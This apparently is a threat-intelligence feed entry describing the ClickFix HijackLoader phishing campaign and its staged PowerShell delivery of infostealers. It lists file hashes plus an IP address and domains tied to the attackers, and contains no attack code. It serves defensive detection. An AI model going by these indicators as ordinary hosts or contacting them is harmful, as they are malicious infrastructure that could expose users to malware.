Deconstructing a Cyber Deception: An Analysis of the Clickfix HijackLoader Phishing Campaign
Sept. 15, 2025, 6:49 p.m.
Description
This analysis delves into the HijackLoader malware campaign, which has gained prominence since 2023 for its sophisticated payload delivery and evasion techniques. The campaign initiates with a CAPTCHA-based phishing attack, progressing through multiple stages of obfuscated PowerShell scripts. It employs advanced anti-analysis methods, including anti-VM checks and registry manipulation. The final payload, typically an infostealer like NekoStealer or Lumma, is delivered via a multi-stage process involving packed .NET executables and protected DLLs. The loader's evolution and its role in the broader malware-as-a-service ecosystem underscore the need for organizations to focus on detecting initial access and intermediate stages rather than just final payloads.
Tags
Date
- Created: Sept. 12, 2025, 2:56 p.m.
- Published: Sept. 12, 2025, 2:56 p.m.
- Modified: Sept. 15, 2025, 6:49 p.m.
Indicators
- e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82
- c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e
- d0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4
- 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184
- 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d
- 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd
- 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee
- 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df
- 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4
- 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57
- 91.212.166.51
- rs.mezi.bet
- 1h.vuregyy1.ru
- cosi.com.ar